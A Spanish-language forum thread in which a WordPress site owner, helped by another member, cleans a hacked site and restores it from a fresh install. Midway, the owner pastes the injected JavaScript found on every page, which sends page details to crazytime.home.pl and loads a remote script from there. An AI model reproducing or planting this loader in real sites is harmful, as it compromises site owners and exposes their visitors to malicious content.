CESAV | Comunidad Española Simulación Automovilistica Virtual | LIGA LFS S3 y Assetto Corsa

Buenas.
Tengo una página hecha con wordpress y hace unos días que hace cosas raras.
La última es que cuando carga las páginas tarda más de lo acostumbrado y mientras carga, en la parte de abajo veo un mensaje que dice "Esperando a crazytime.home.pl...". No sé que es eso. Tengo pocos plugins y ninguno con ese nombre.
Me he instalado esto: https://es.wordpress.org/plugins/all-in-one-wp-security-and-firewall/ (https://es.wordpress.org/plugins/all-in-one-wp-security-and-firewall/) para prevenir pero no encuentro una buena herramienta para escanear y limpiar.
¿Algún consejo?
Gracias.

Te habrán entrado e inyectado codigo malicioso.. La única opción es que limpies la web manualmente, bien restaurando backup si tenias, o eliminando el código manualmente si no tenias copia de seguridad..

No sé desde cuando debe estar así.
¿Cómo hago para limpiar manualmente? ¿Cómo sé que archivos están infectados?

La he dado a "ver codigofuente de la página" y me encuentro que todas las páginas tienen esto:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://crazytime.home.pl/js/jquery.min.php"; var n_url = base   "?default_keyword="   default_keyword   "&se_referrer="   se_referrer   "&source="   host; var f_url = base   "?c_utt=snt2014&c_utm="   encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="'   f_url   '">'   '<'   '/script>');}</script>

Pero ¿cómo lo quito?

Pues conecta por FTP, y busca en que archivo está eso, y lo borras. Estará en uno solo, seguramente en el index.php o en el template..

De todos modos con eso no solucionas nada, ya que si lo ha hecho una vez, lo podrá hacer más veces, así que actualiza wordpress, cambia claves ftp etc

Vale, ya lo he encontrado. Estaba en uno de los archivos del tema.
Ahora ya carga mucho más rápido.
El wordpress ya lo tengo actualizado. Cambiaré claves y revisaré usuarios.
Gracias Neón.

Mira también que no tengas más archivos extraños, y que los permisos de las carpetas sean los justos para que el wp funcione, y que no te puedan colar nada..

De nada, suerte que haya sido solo eso

Pues, después de haber limpiado los archivos y de que los proveedores del alojamiento me hicieran un escaneo, hoy me he encontrado otra vez con un script en el mismo archivo del tema que el otro día. ¿Cómo se puede evitar eso? ¿Por dónde entran?

Analizando logs es la única manera de ver las peticiones al servidor..

Buf, no sé cómo se hace eso.
¿Dónde encuentro esos logs?
¿Tiene que ser alguna opcion del panel de control o tengo que mirar por ftp alguna carpeta en concreto?

En el panel de control lo debes tener, pero no en el panel del wp, sino del hosting

Sí, entiendo. Pues no lo encuentro. Preguntaré a los del hosting. Gracias.

Bueno. sigo con problemas en mi web. Ahora, los del hosting me la han bloqueado porque dicen que hay envío de spam desde mi web...
Me dicen que lo mejor seria que eliminase todo y montase una página nueva.
Como es una página sencillita creo que no voy a discutir mucho y miraré de hacerlo.
Lo que pasa es que no domino el tema. Hace años le instalé el Wordpress y luego todo lo he ido haciendo desde el panel de wordpress.
Mi primera pregunta es: Eliminar todo quiere decir eliminar todas las carpetas que veo desde el ftp? Es decir: anon_ftp, bin, cgi-bin, conf, dev, error_docs, etc, httpdocs, httpsdocs, lib, lib64, pd, private, statistics, subdomains, tmp, usr, var, web_users? O sólo es la httpdocs que es dónde tengo el wordpress?
Gracias.

Si lo que tienes es un wordpress, no vayas a empezar la web de 0, simplemente borras el sistema de archivos wp, y metes la última versión disponible. Conectas con la base de datos y listo.

Pero si quien sea tiene acceso a tu host como imagino que lo tiene, esa solución te va a durar 2 dias.. Es posible incluso que tenga una cuenta registrada en wp, o tenga la clave de administrador, o haya creado una cuenta admin.. Muchas opciones son posibles.

Con que empresa de hosting lo tienes contratado?

Es importante también ver que permisos tienen las carpetas, no sea que lo tengas todo con 777 y te la estén colando por ahí

Ok. Bueno, a la gestión de la web sólo entramos dos usuarios. Si les cambio la contraseña y elimino alguno más que pueda haber ya lo tendría más controlado, no?

El wp está en la carpeta httpdocs. ¿Las demás sirven? ¿Las puedo eliminar?

El proveedor es Virtualpyme.

Las carpetas del wp las tengo con permisos 755.

No se si sirven o no, depende como tengan montando el host, lo que me parece es caro xD
Puedes mirar lo que hay en el contenido de esas carpetas y te haces una idea a ver..

No se, empieza por cambiar las 2 claves esas, metes un wp actualizado y limpio, y lo conectas a ver como va..

Gracias Neon. Los del hosting me dicen que deje las demás carpetas y elimine sólo el contenido de httpdocs.
Lo acabo de hacer, he instalado la última versión del wp, mi tema limpio y ya tengo la página funcionando.
A ver qué pasa.
De momento, en menos de una hora ya se me han registrado dos usuarios raros.
Voy a desactivar lo del registro de usuarios. De momento no lo necesito.
Gracias por tu ayuda  ;)

De nada, ya me contarás que tal va eso   :)

Hola Neon,
Sólo comentar que desde que hice la "limpieza" no he vuelto a tener problemas.
Gracias.

Me alegro  ;D

Ya sabes, manten la versión del Wordpress actualizada y todo debería ir bien  :D